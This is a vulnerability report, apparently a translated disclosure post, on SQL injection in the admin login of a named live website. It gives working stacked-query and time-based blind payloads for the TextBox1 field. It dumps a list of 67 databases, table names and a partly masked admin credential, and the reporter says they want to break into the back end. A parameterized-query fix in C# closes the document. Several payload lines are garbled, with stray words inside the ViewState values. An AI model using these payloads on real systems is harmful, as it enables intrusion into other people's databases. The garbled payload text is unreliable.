Xin Yi Network (Master of Flash machine): SQL injection in a system's login page exposes a large number of databases
http://fx.mgyun.com/main/admin/login.aspx (POST)
button1=&TextBox1=rrNqPVs&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/tests/RuhzY1oLb/tests%3d&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7 soAnkm/NxYDeJrd4mcNVYdeEDZxzSA%3d%3d
Parameter TextBox1, reference payload: rrNqPVs'; waitfor delay '0:0:5'--
---
Parameter: TextBox1 (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Button1=&TextBox1=rrNqPVs'; WAITFOR DELAY '0:0:5'--&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/tests/RuhzY1oLb/tests + keys =&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJ OTk2MDA3NzM2ZGSUmCpyWWbsdK/7 soAnkm/Tables =

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: button1=&TextBox1=rrNqPVs' OR 9245=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'fgsi'='fgsi&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/clusters/RuhzY1oLb/clusters + cores =&__LASTFOCUS=&__VIEWSTATE=/clusters/7 soAnkm/servers =
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008

available databases [67]:
[*] AnalyzeSystem
[*] ApkGrabDB
[*] AppCoolPoints
.............

Database: AnalyzeSystem
[7 tables]
+------------+
| Admin      |
| Functions  |
| Group      |
| Manager    |
| MenuConfig |
| Model      |
| ModelGroup |
+------------+

Get the management password from here.

Table: admin
[1 entry]
+---------+---------+------------+-----------------+-------------------------------------+
| AdminID | GroupID | DateLine   | AdminPwd        | AdminName                           |
+---------+---------+------------+-----------------+-------------------------------------+
| 1       | 0       | 09 25 2012 | large ??? Tower | 3f85cffcdcf ***** a8a3b66cd47f7afed |
+---------+---------+------------+-----------------+-------------------------------------+

It is a pity that it has not been cracked yet. Otherwise, I would really want to go to the back end! The amount of information there is estimated to be large enough!
Solution:
Filter the input.
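
One way to apply this fix to the TextBox1/TextBox2 login form, as an added example that is not the site's own code. The Admin, AdminName and AdminPwd names come from the dump above; the dbo schema, the connection string name, the column sizes, the allow-list pattern and the query itself are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class AdminLogin
{
    // Allow-list filter (assumed policy): letters, digits, '_', '.', '-' only,
    // so quotes, semicolons and comment markers never reach the query layer.
    private static readonly Regex NamePattern =
        new Regex(@"^[\p{L}\p{N}_.-]{1,32}$", RegexOptions.CultureInvariant);

    // Presumed vulnerable pattern, shown for contrast only:
    //   "... WHERE AdminName = '" + TextBox1.Text + "'"
    // A quote in TextBox1 closes the literal, and everything after it
    // (such as the WAITFOR DELAY probe above) is executed as SQL.

    public static bool Verify(string adminName, string passwordHash)
    {
        if (adminName == null || passwordHash == null) return false;
        if (!NamePattern.IsMatch(adminName)) return false;

        // "AnalyzeSystem" as a connection string name is hypothetical.
        string cs = ConfigurationManager
            .ConnectionStrings["AnalyzeSystem"].ConnectionString;

        // Fixed SQL text: user input is never concatenated into it.
        const string sql =
            "SELECT COUNT(*) FROM dbo.Admin " +
            "WHERE AdminName = @name AND AdminPwd = @pwd";

        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Typed, length-bounded parameters are sent separately from the
            // statement, so their content is always treated as data.
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 32).Value = adminName;
            cmd.Parameters.Add("@pwd", SqlDbType.VarChar, 64).Value = passwordHash;
            cmd.CommandTimeout = 5; // seconds; bounds a slow or stalled query
            conn.Open();
            return (int)cmd.ExecuteScalar() == 1;
        }
    }
}
```

The parameterized query is what removes the injection; the allow-list is a second layer. Since the output above shows this one login reaching 67 databases, the application's SQL Server login should also be restricted to the database it actually needs.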